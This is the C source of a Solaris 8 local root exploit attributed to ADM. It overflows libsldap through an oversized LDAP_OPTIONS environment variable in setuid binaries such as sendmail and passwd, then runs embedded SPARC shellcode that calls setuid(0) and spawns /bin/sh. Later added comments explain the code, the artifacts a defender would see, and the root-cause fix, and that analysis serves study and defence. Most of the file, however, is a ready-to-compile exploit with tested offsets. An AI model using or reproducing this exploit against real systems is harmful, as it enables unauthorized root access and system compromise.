/* Copyright (c) 2001 ADM */
/* All Rights Reserved */
/* THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ADM */
/* The copyright notice above does not evidence any */
/* actual or intended publication of such source code. */
/* */
/* Title: Solaris libsldap exploit */
/* Tested under: Solaris 8 */
/* By: K2 */
/* Use: gcc -o sol-sldap sol-sldap.c */
/* ./sol-sldap -o 10000 */
/* SENDMAIL 4 LIFE *@!$()*@(#@$)$!!!@$ */
/* */
/* Note: LDAP_OPTIONS= will overflow many binaries */
/* sendmail,[yp,nis]passwd,chkey */
/* example command line args @ bottom... */
/* Thanx: cheez,ND,str,!ADM@$*(!#@$! */


/* Sizes of the buffers and environment payloads built in main(). */
#define BUFLEN 4000 /* capacity of buf, buf2 and egg (each declared BUFLEN+1 for the NUL) */
#define NOPLEN 2000 /* bytes of NOP filler written at the front of buf */
#define ADDRLEN 1440 /* bytes of repeated return address written into buf2 */
#define SAFES 16 /* not referenced anywhere in this file */

#define OFFSET 0 /* default offset added to the sampled %sp (overridden by -o) */
#define NOP 0x801bc00f /* xor %o7,%o7,%g0 -- SPARC instruction whose result lands in %g0, so it does nothing */

#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/*
 * SPARC payload appended to the NOP filler in the EGG= environment value.
 * Per the per-instruction annotations it issues three traps (`ta 8`) after
 * loading 23, 27 and 59 into %g1, and assembles the constants 0x2f62696e /
 * 0x2f736800 ("/bin" "/sh\0") on the stack before the last one. Each 4-byte
 * group is one big-endian instruction; the array holds no zero byte, which
 * is why main() can measure it with strlen().
 */
char shell[] =
/* setuid: [2000]*/
/* 0 */ "\x90\x1b\xc0\x0f" /* xor %o7,%o7,%o0 [2000]*/
/* 4 */ "\x82\x10\x20\x17" /* mov 23,%g1 [2000]*/
/* 8 */ "\x91\xd0\x20\x08" /* ta 8 [2000]*/
/* alarm: [2000]*/
/* 12 */ "\x90\x1b\xc0\x0f" /* xor %o7,%o7,%o0 [2000]*/
/* 16 */ "\x82\x10\x20\x1b" /* mov 27,%g1 [2000]*/
/* 20 */ "\x91\xd0\x20\x08" /* ta 8 [2000]*/
/* execve: [2000]*/
/* 24 */ "\x2d\x0b\xd8\x9a" /* sethi %hi(0x2f62696e),%l6 */
/* 28 */ "\xac\x15\xa1\x6e" /* or %l6,%lo(0x2f62696e),%l6 */
/* 32 */ "\x2f\x0b\xdc\xda" /* sethi %hi(0x2f736800),%l7 */
/* 36 */ "\x90\x0b\x80\x0e" /* and %sp,%sp,%o0 [2000]*/
/* 40 */ "\x92\x03\xa0\x08" /* add %sp,8,%o1 [2000]*/
/* 44 */ "\x94\x1b\xc0\x0f" /* xor %o7,%o7,%o2 [2000]*/
/* 48 */ "\x9c\x03\xa0\x10" /* add %sp,16,%sp [2000]*/
/* 52 */ "\xec\x3b\xbf\xf0" /* std %l6,[%sp-16] [2000]*/
/* 56 */ "\xd0\x23\xbf\xf8" /* st %o0,[%sp-8] [2000]*/
/* 60 */ "\xc0\x23\xbf\xfc" /* st %g0,[%sp-4] [2000]*/
/* 64 */ "\x82\x10\x20\x3b" /* mov 59,%g1 [2000]*/
/* 68 */ "\x91\xd0\x20\x08"; /* ta 8 [2000]*/

extern char *optarg; /* getopt(3) state; <unistd.h>, included above, already declares this */

/*
 * Return the current stack pointer (SPARC only).
 *
 * There is no C return statement: the inline asm copies %sp into %i0, the
 * register a SPARC function with a register window hands back to its caller
 * as %o0 on restore. Falling off the end of a non-void function and then
 * using the value is undefined behavior in C; this relies on the compiler
 * emitting a save/restore frame for the function. Does not build on other
 * architectures.
 */
unsigned long int
get_sp()
{
__asm__("or %sp,%sp,%i0");
}

/*
 * Entry point: builds two environment strings and replaces this process with
 * the target program (sendmail by default; alternatives are listed, commented
 * out, below). Per the file header, the LDAP_OPTIONS= value is what overflows
 * a buffer in libsldap inside the setuid target; EGG= carries the NOP filler
 * followed by `shell`, and -o/-1/-2 adjust the address and two byte shifts.
 *
 * Defender's view: the observable artifacts are an LDAP_OPTIONS environment
 * value ADDRLEN bytes long consisting of one 32-bit address repeated, and an
 * EGG value of about 2 KB beginning with repeated 0x801bc00f words. The root
 * cause is a setuid program copying an environment value into a fixed buffer
 * without a length check; the fix belongs in that copy.
 *
 * One strcpy below (see dtdata) deliberately runs past its own 14-byte array
 * into neighbouring locals of this frame; that is undefined behavior in C and
 * the program's outcome depends on the compiler's stack layout of these locals.
 */
int
main(int argc, char *argv[])
{
unsigned long int sp, addr,a1=2,a2=1,offset; /* a1/a2: byte shifts applied to the two payloads */
int c, i;
char *program, buf[BUFLEN+1],buf2[BUFLEN+1], *cp;
char dtdata[] = "LDAP_OPTIONS="; /* 14 bytes including the NUL; see the strcpy below */
char dtstr[] = "LDAP_OPTIONS=";
char egg[BUFLEN+1] = "EGG="; /* remainder is zero-filled */
char eggstr[] = "EGG=";

program = argv[0];
offset = OFFSET;

/* getopt returns -1 at the end of the options; EOF happens to equal -1 on
 * the intended platform, but -1 is the value the interface documents.
 * "h:" is accepted by the option string yet has no case and so falls into
 * the usage message. */
while ((c = getopt(argc, argv, "1:2:h:o:")) != EOF)
{
switch (c)
{
case 'o':
/* strtol's long is narrowed to int and then widened to unsigned long:
 * a negative offset wraps to a large value. strtol errors are not checked. */
offset = (int) strtol(optarg, NULL, 0);
break;
case '1':
a1 = (int) strtol(optarg, NULL, 0); /* no range check: a large value makes the egg strcpy below overrun */
break;
case '2':
a2 = (int) strtol(optarg, NULL, 0);
break;
default:
fprintf(stderr, "usage: %s [-o offset] "
"[-1 align1 (NOPS)] [-2 align2 (ADDRESS)]\n", program);
exit(1);
break;
}
}
/* Fill buf with 0xff, then overwrite the first NOPLEN bytes with the NOP
 * word, most-significant byte first (SPARC is big-endian). */
memset(buf, '\xff', BUFLEN);
for (i = 0, cp = buf; i < NOPLEN / 4; i++)
{
*cp++ = (NOP >> 24) & 0xff;
*cp++ = (NOP >> 16) & 0xff;
*cp++ = (NOP >> 8) & 0xff;
*cp++ = (NOP >> 0) & 0xff;
}
/* Append the payload (strlen is valid because shell has no zero byte) and
 * terminate; the 0xff tail beyond this point is never used. */
memcpy(cp, shell, strlen(shell));
buf[NOPLEN+strlen(shell)] = '\0';

/* Copy buf into egg at byte offset a1, then re-stamp the "EGG=" prefix over
 * the first 4 bytes. a1 + NOPLEN + strlen(shell) must stay below BUFLEN and
 * is not checked. putenv keeps the pointer itself rather than a copy, so egg
 * must stay alive; it does, because execl follows. */
strcpy(egg+a1,buf);
memcpy(egg,eggstr,strlen(eggstr));
putenv(egg);

/* Target address: this frame's %sp plus the -o offset, rounded down to a
 * multiple of 8. The 32-bit mask assumes 32-bit pointers (the Solaris 8
 * SPARC ABI this was written for); in a 64-bit build it would also clear
 * the upper half of the address. */
sp = get_sp();
addr = sp + offset;
addr &= 0xfffffff8;

/* buf2 becomes ADDRLEN bytes of that address repeated, big-endian. */
for (i = 0, cp = buf2; i < ADDRLEN / 4; i++)
{

*cp++ = (addr >> 24) & 0xff;
*cp++ = (addr >> 16) & 0xff;
*cp++ = (addr >> 8) & 0xff;
*cp++ = (addr >> 0) & 0xff;
}
buf2[ADDRLEN] = '\0';

/* dtdata is only 14 bytes: this strcpy writes ADDRLEN+1 bytes starting at
 * dtdata+a2 and runs far past the array into neighbouring locals of this
 * frame (undefined behavior; it works only under the compiler's actual
 * stack layout). The memcpy then restores the "LDAP_OPTIONS=" prefix. */
strcpy(dtdata+a2,buf2);
memcpy(dtdata,dtstr,strlen(dtstr));
putenv(dtdata);

/* Format defects: offset is unsigned long but printed with %d, and the
 * strlen() result (size_t) is printed with %d. */
fprintf(stderr, "%%sp 0x%08lx offset %d --> return address 0x%08lx, strlen(buf2) %d\n", sp, offset, addr, strlen(buf2));

/* Replace the process image; the environment, including the two strings
 * above, is inherited by the target. A bare NULL as the variadic terminator
 * should be (char *)0 for portability. exit(1) is reached only if execl
 * fails. */
execl("/usr/lib/sendmail","sendmail", NULL); /* -o 10000 -1 4 */
// execl("/usr/bin/passwd","passwd", NULL); /* -o 10000 -1 2 */
// execl("/usr/bin/yppasswd","yppasswd", NULL); /* -o 10000 -1 4 */
// execl("/usr/bin/nispasswd","nispasswd", NULL); /* -o 10000 -1 3 */
// execl("/usr/bin/chkey","chkey",NULL); /* -o 10000 -1 3 -2 1 */
exit(1);
}